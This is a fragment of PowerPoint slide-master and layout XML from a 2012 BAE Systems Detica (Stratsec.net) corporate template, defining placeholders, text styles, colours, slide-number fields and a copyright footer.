            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AE735F34-3A8E-4181-9C69-713C9BC81E51}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23819010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DETAILS Slide">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238126" y="1600201"/>
            <a:ext cx="4333874" cy="2044824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-GB" b="1" smtClean="0">
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="179387" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>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sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238126" y="3978151"/>
            <a:ext cx="4333874" cy="2044824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1000" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="179387" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>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4" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B84833F5-20B2-4BE1-87AF-5C7AC91C5B53}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="738318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REEDOM OF INFORMATION ACT Slide">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238126" y="1600201"/>
            <a:ext cx="4333874" cy="4422774"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-GB" b="1" smtClean="0">
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1000" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="179387" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>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3" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6102FA57-774C-40D6-843C-9346051950F9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25539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460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pP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417190"/>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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3550E78A-FEDC-468B-9A91-2E4554CAEF4F}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397363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TEXT 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460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>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417190"/>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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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E55F8FC9-A013-44DB-9565-1F8F92F5828F}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63838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TEXT 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460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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417190"/>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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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2E5BB132-E8B2-4060-A4E7-0A17E6C0697A}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135481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TEXT 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460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>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417190"/>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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7E983020-E776-4A28-BC44-01C664B680DD}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320544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URPLE TEXT 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460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="6E1873"/>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417190"/>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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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D5BC3D25-8D60-45D2-8A2F-4A47CF721B2B}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378552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TEXT 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661" y="1600225"/>
            <a:ext cx="8573963" cy="830997"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>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38125" y="2060848"/>
            <a:ext cx="8572500" cy="46080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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237146" y="2723778"/>
            <a:ext cx="8572500" cy="417190"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0" defTabSz="180975">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0" defTabSz="180975">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{05B6D72B-E78D-42C1-820F-9F3E599FDF9C}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277415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FontTx/>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0AB0CFA9-89F7-401B-8A8C-4C85A1343609}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365491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38125" y="781050"/>
            <a:ext cx="856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238125" y="1600200"/>
            <a:ext cx="85550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5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5427663" y="6445250"/>
            <a:ext cx="2895600" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8589963" y="6443663"/>
            <a:ext cx="309562" cy="249237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{01F6004C-0DD6-44F7-A723-62A7040792C5}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 7" descr="BLACK DETICA LOGOTYPE.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="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236538" y="287338"/>
            <a:ext cx="103028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 descr="BAE_S_TITLE_LOGO"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId31" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6972300" y="292100"/>
            <a:ext cx="18351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36525" y="6469063"/>
            <a:ext cx="3890809" cy="340093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Stratsec.net Pty Ltd trading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE Systems Detica (2012). All rights reserved.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE SYSTEMS and DETICA are trade marks of BAE Systems plc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1347788"/>
            <a:ext cx="9144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7" r:id="rId11"/>
    <p:sldLayoutId id="2147483666" r:id="rId12"/>
    <p:sldLayoutId id="2147483665" r:id="rId13"/>
    <p:sldLayoutId id="2147483664" r:id="rId14"/>
    <p:sldLayoutId id="2147483678" r:id="rId15"/>
    <p:sldLayoutId id="2147483679" r:id="rId16"/>
    <p:sldLayoutId id="2147483680" r:id="rId17"/>
    <p:sldLayoutId id="2147483681" r:id="rId18"/>
    <p:sldLayoutId id="2147483682" r:id="rId19"/>
    <p:sldLayoutId id="2147483663" r:id="rId20"/>
    <p:sldLayoutId id="2147483662" r:id="rId21"/>
    <p:sldLayoutId id="2147483661" r:id="rId22"/>
    <p:sldLayoutId id="2147483660" r:id="rId23"/>
    <p:sldLayoutId id="2147483659" r:id="rId24"/>
    <p:sldLayoutId id="2147483658" r:id="rId25"/>
    <p:sldLayoutId id="2147483683" r:id="rId26"/>
    <p:sldLayoutId id="2147483657" r:id="rId27"/>
    <p:sldLayoutId id="2147483656" r:id="rId28"/>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tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="179388" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst>
          <a:tab pos="623888" algn="l"/>
        </a:tabLst>
        <a:defRPr kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="358775" indent="-179388"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3pPr>
